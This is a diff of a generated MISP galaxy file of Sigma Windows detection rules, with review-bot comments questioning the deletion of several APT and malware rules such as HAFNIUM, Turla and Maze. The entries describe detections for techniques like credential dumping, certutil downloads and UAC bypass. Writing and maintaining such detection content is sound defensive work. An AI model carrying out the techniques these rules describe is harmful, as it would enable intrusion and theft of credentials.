- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml"
],
"tags": [
@@ -58734,8 +56877,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/MichalKoczwara/status/1553634816016498688",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml"
],
"tags": [
@@ -58755,51 +56898,6 @@
"uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980",
"value": "Disable Important Scheduled Task"
},
- {
- "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/03/09",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_hafnium.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3",
- "https://twitter.com/GadixCRK/status/1369313704869834753?s=20",
- "https://twitter.com/BleepinComputer/status/1372218235949617161",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546",
- "attack.t1053"
- ]
- },
- "related": [
- {
- "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7",
- "value": "HAFNIUM Exchange Exploitation Activity"
- },
{
"description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n",
"meta": {
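Review bot: Removing `bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7` drops a `critical`-level rule tied to the HAFNIUM/ProxyLogon Exchange campaign together with its two `related` links (`attack.t1546`, `attack.t1053`). Same request as for the other deleted `apt_` entries: confirm that upstream actually retired `proc_creation_win_apt_hafnium.yml` rather than moving it, because MISP events tagged with this cluster during the 2021 Exchange incident response will silently lose their mapping once the UUID disappears.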
@@ -58834,49 +56932,6 @@
"uuid": "41ca393d-538c-408a-ac27-cf1e038be80c",
"value": "Directory Removal Via Rmdir"
},
- {
- "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_unc2452_ps.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.t1047"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c",
- "value": "UNC2452 PowerShell Pattern"
- },
{
"description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID",
"meta": {
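Review bot: Same concern as the other removals: cluster `b7155193-8a81-4d8f-805d-88de864ca50c` (UNC2452/SolarWinds PowerShell pattern, level `critical`, links to `attack.t1059.001` and `attack.t1047`) disappears with no replacement and no deprecation marker. If the `apt_` rules were moved out of `rules/windows/process_creation/` upstream, the generator's directory filter is the thing to fix; if they were deleted, keep the UUID as a deprecated entry so existing tags keep resolving.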
@@ -58890,8 +56945,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml"
],
"tags": "No established tags"
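Review bot: The context line `"tags": "No established tags"` shows the generator emitting `tags` as a string for rules without ATT&CK tags, while every other entry in this file uses an array. Consumers that iterate `meta.tags` will either fail or iterate the characters of that string; emit `[]` (or omit the key) instead. Not introduced by this diff, but since the generator output is being regenerated here, this is the moment to fix it.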
@@ -58970,10 +57025,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
- "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7",
"https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support",
"https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/",
+ "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
+ "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml"
],
"tags": [
@@ -59050,8 +57105,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/",
"https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"
],
@@ -59097,8 +57152,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax",
+ "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"
],
"tags": [
@@ -59204,9 +57259,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
"https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
+ "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml"
],
"tags": [
@@ -59226,47 +57281,6 @@
"uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48",
"value": "Operator Bloopers Cobalt Strike Modules"
},
- {
- "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.",
- "meta": {
- "author": "Andreas Hunkeler (@Karneades)",
- "creation_date": "2022/02/07",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_actinium_persistence.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053",
- "attack.t1053.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602",
- "value": "Potential ACTINIUM Persistence Activity"
- },
{
"description": "Detects usage of wmic to start or stop a service",
"meta": {
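Review bot: Cluster `e1118a8f-82f5-44b3-bb6b-8a284e5df602` is removed along with its `attack.t1053` and `attack.t1053.005` links. Its description and refs (`proc_creation_win_apt_actinium_persistence.yml`, the Microsoft ACTINIUM write-up) are still valid, so the deletion needs a stated reason; confirm the upstream rule's fate and, if it merely moved, keep the entry with the new `filename` and `refs`.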
@@ -59515,10 +57529,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
"https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml"
],
@@ -59743,8 +57757,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml"
],
"tags": [
@@ -59777,9 +57791,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib",
- "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml"
],
"tags": [
@@ -59812,8 +57826,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"
],
"tags": [
@@ -59847,8 +57861,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md",
"https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
+ "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_script_run.yml"
],
"tags": [
@@ -59882,8 +57896,8 @@
"logsource.product": "windows",
"refs": [
"https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md",
+ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml"
],
"tags": [
@@ -59903,66 +57917,6 @@
"uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89",
"value": "Remote CHM File Download/Execution Via HH.EXE"
},
- {
- "description": "Detects automated lateral movement by Turla group",
- "meta": {
- "author": "Markus Neis",
- "creation_date": "2017/11/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_turla_commands_critical.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/the-epic-turla-operation/65545/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml"
- ],
- "tags": [
- "attack.g0010",
- "attack.execution",
- "attack.t1059",
- "attack.lateral_movement",
- "attack.t1021.002",
- "attack.discovery",
- "attack.t1083",
- "attack.t1135"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f",
- "value": "Turla Group Lateral Movement"
- },
{
"description": "Extract data from cab file and hide it in an alternate data stream",
"meta": {
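Review bot: This removal also discards the only `attack.g0010` group tag among the entries touched by this diff, i.e. the explicit link from a detection rule to the Turla threat-actor entry, plus four `related` dest-uuids (T1059, T1021.002, T1083, T1135). A 2017 rule at `level: critical` vanishing silently is exactly what downstream correlation will miss; treat it like the other `apt_` deletions and confirm relocation versus retirement before merging.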
@@ -60010,8 +57964,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://ss64.com/nt/logman.html",
"https://twitter.com/0gtweet/status/1359039665232306183?s=21",
+ "https://ss64.com/nt/logman.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml"
],
"tags": [
@@ -60052,11 +58006,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://twitter.com/cglyer/status/1355171195654709249",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://twitter.com/cglyer/status/1355171195654709249",
"https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml"
],
"tags": [
@@ -60089,9 +58043,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md",
"https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html",
"https://github.com/frgnca/AudioDeviceCmdlets",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml"
],
"tags": [
@@ -60111,58 +58065,6 @@
"uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6",
"value": "Audio Capture via PowerShell"
},
- {
- "description": "Detects specific process characteristics of Maze ransomware word document droppers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/08",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_maze_ransomware.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
- "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/",
- "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_maze_ransomware.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1204.002",
- "attack.t1047",
- "attack.impact",
- "attack.t1490"
- ]
- },
- "related": [
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052",
- "value": "Potential Maze Ransomware Activity"
- },
{
"description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file",
"meta": {
@@ -60176,9 +58078,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml"
],
"tags": [
@@ -60211,10 +58113,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return",
- "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://nodejs.org/api/cli.html",
+ "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml"
],
"tags": [
@@ -60247,9 +58149,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
"https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b",
"https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml"
],
"tags": [
@@ -60270,57 +58172,6 @@
"uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc",
"value": "UAC Bypass Using ChangePK and SLUI"
},
- {
- "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/11/23",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2017_11882.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100",
- "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1203",
- "attack.t1204.002",
- "attack.initial_access",
- "attack.t1566.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a",
- "value": "Droppers Exploiting CVE-2017-11882"
- },
{
"description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n",
"meta": {
@@ -60367,8 +58218,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware",
"https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior",
+ "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml"
],
"tags": [
@@ -60388,41 +58239,6 @@
"uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f",
"value": "Fsutil Behavior Set SymlinkEvaluation"
},
- {
- "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/06/12",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/",
- "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_plugx_susp_exe_locations.yml"
- ],
- "tags": [
- "attack.s0013",
- "attack.defense_evasion",
- "attack.t1574.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2",
- "value": "Potential PlugX Activity"
- },
{
"description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID",
"meta": {
@@ -60544,40 +58360,6 @@
"uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8",
"value": "Suspicious Hacktool Execution - Imphash"
},
- {
- "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'",
- "meta": {
- "author": "Aedan Russell, frack113 (sigma)",
- "creation_date": "2022/06/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_browsers_chrome_load_extension.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/chromeloader/",
- "https://emkc.org/s/RJjuLa",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chrome_load_extension.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1176"
- ]
- },
- "related": [
- {
- "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e",
- "value": "Powershell ChromeLoader Browser Hijacker"
- },
{
"description": "Detects Obfuscated use of Environment Variables to execute PowerShell",
"meta": {
@@ -60699,9 +58481,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
"https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
"http://www.xuetr.com/",
+ "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml"
],
"tags": "No established tags"
@@ -60792,40 +58574,6 @@
"uuid": "502b42de-4306-40b4-9596-6f590c81f073",
"value": "Local Accounts Discovery"
},
- {
- "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.",
- "meta": {
- "author": "David Burkett, Florian Roth",
- "creation_date": "2019/12/28",
- "falsepositive": [
- "Rare System Admin Activity"
- ],
- "filename": "proc_creation_win_malware_trickbot_recon_activity.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1482"
- ]
- },
- "related": [
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "410ad193-a728-4107-bc79-4419789fcbf8",
- "value": "Trickbot Malware Reconnaissance Activity"
- },
{
"description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines",
"meta": {
@@ -60901,50 +58649,6 @@
"uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e",
"value": "Arbitrary Shell Command Execution Via Settingcontent-Ms"
},
- {
